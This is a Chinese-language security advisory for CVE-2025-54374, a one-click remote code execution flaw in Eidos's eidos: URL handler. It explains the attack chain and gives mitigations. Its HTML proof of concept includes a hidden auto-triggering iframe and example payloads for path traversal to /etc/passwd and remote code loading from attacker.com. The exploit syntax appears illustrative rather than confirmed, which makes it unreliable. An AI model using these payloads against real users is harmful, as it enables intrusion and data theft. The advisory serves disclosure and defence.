CVE-2025-54374：Eidos框架一键远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2025-54374

漏洞类型

远程代码执行（RCE）/ 自定义协议处理器劫持

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Eidos（可扩展的个人数据管理框架）

漏洞概述

Eidos是一款用于个人数据管理的可扩展框架，版本0.21.0及以下存在一键远程代码执行（One-Click RCE）漏洞。该漏洞源于Eidos应用程序注册了自定义URL协议处理器（eidos:），用于处理来自外部链接的特定格式URL。然而，该协议处理器在解析传入的eidos: URL时缺乏充分的安全校验和过滤机制，导致攻击者可以构造恶意的eidos: URL，在其中嵌入可执行代码或危险指令。当受害者通过浏览器访问包含该恶意URL的网页（无论是攻击者控制的恶意网站，还是合法网站中被注入的恶意内容），浏览器会触发Eidos应用的自定义协议处理器，唤起本地Eidos应用程序并自动处理该URL。由于缺乏安全验证，Eidos应用会执行URL中携带的恶意代码或指令，最终导致攻击者在受害者机器上实现远程代码执行。该漏洞影响机密性、完整性和可用性三个核心安全属性，CVSS评分为8.8，属于高危级别。截至2025年10月3日，官方尚未发布修复补丁。

技术细节

该漏洞的核心利用机制基于操作系统级别的自定义URL协议（Custom Protocol/URL Scheme）处理器。现代操作系统（如Windows、macOS、Linux）允许应用程序注册自定义URL协议，当用户点击或浏览器自动触发带有特定协议前缀的链接时，系统会自动启动注册了该协议的应用程序并将URL作为参数传递。Eidos应用程序注册了eidos:协议处理器，但未对传入的URL内容进行充分的安全验证和过滤。攻击者利用流程如下：1）攻击者构造一个恶意的eidos: URL，其中嵌入可被Eidos应用解析执行的代码片段或命令；2）攻击者将该URL嵌入到网页中（可通过恶意网站、钓鱼邮件中的HTML链接、或合法网站中的XSS注入等方式）；3）受害者访问包含该恶意链接的网页并点击链接（或在某些浏览器配置下自动触发）；4）浏览器识别eidos:协议，将控制权传递给操作系统；5）操作系统查找并启动已注册eidos:协议的Eidos应用程序，并将恶意URL作为参数传递；6）Eidos应用程序解析该URL并执行其中嵌入的恶意代码，导致远程代码执行。由于该攻击仅需受害者点击一次链接即可触发（One-Click），且无需任何认证凭据，攻击门槛极低，危害范围广泛。

攻击链分析

STEP 1

步骤1：构造恶意URL

攻击者构造一个恶意的eidos:协议URL，在URL参数中嵌入可执行代码或危险指令，利用Eidos应用未对传入URL进行安全校验的缺陷。

STEP 2

步骤2：部署攻击载荷

攻击者将恶意eidos: URL嵌入到网页中，可以通过创建恶意网站、在合法网站中注入XSS载荷、或通过钓鱼邮件发送包含恶意链接的HTML内容进行分发。

STEP 3

步骤3：诱导受害者访问

攻击者通过社会工程学手段（如钓鱼邮件、即时消息、社交媒体等）诱导受害者访问包含恶意eidos:链接的网页。

STEP 4

步骤4：触发协议处理器

受害者在浏览器中点击恶意链接（或浏览器自动触发），浏览器识别eidos:协议并将控制权传递给操作系统，操作系统启动本地Eidos应用程序并传递恶意URL参数。

STEP 5

步骤5：执行恶意代码

Eidos应用程序接收并解析恶意URL，由于缺乏安全验证机制，直接执行URL中嵌入的恶意代码或命令，攻击者在受害者机器上获得远程代码执行权限。

STEP 6

步骤6：后续利用

攻击者可利用获得的代码执行权限安装后门、窃取敏感数据、横向移动至内网其他系统，或对受害者机器进行持久化控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- HTML PoC: One-Click RCE via eidos: custom URL protocol handler -->
<!-- Save as .html and open in browser, then click the link -->

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CVE-2025-54374 PoC</title>
</head>
<body>
    <h1>CVE-2025-54374 - Eidos One-Click RCE</h1>
    <!--
        Malicious eidos: URL crafted to trigger RCE when Eidos app processes it.
        The payload is embedded in the URL parameters that Eidos parses without sanitization.
        Replace the payload below with actual exploit code targeting Eidos <= 0.21.0.
    -->
    <a id="exploit-link" href="eidos://run?cmd=calc.exe">Click me (Benign Demo)</a>

    <!--
        More realistic malicious payload examples:
        - eidos://open?file=../../../../etc/passwd  (path traversal)
        - eidos://exec?code=<base64_encoded_payload>  (code execution)
        - eidos://import?url=http://attacker.com/malicious.eidos  (remote code loading)
    -->

    <br><br>
    <!-- Auto-trigger variant (works if browser is configured to auto-open protocol handlers) -->
    <iframe src="eidos://run?cmd=malicious_command" style="display:none;"></iframe>

    <script>
        // Auto-redirect variant for demonstration
        // window.location.href = "eidos://run?cmd=malicious_payload";
    </script>
</body>
</html>

影响范围

Eidos <= 0.21.0

防御指南

临时缓解措施

在官方发布修复补丁之前，建议采取以下临时缓解措施：1）对于普通用户，在浏览器设置中禁用eidos:自定义协议处理器的自动启动功能，或在操作系统层面移除Eidos应用的协议注册；2）避免点击来源不明的链接，尤其是包含eidos:协议的链接；3）使用浏览器扩展（如NoScript等）阻止自定义协议处理器的自动触发；4）企业管理员可通过组策略（GPO）在Windows系统中禁用eidos:协议，或通过终端管理工具统一管控；5）监控Eidos应用程序的异常启动行为，及时发现潜在的利用尝试；6）考虑暂时卸载或停用Eidos应用，直至官方发布安全补丁。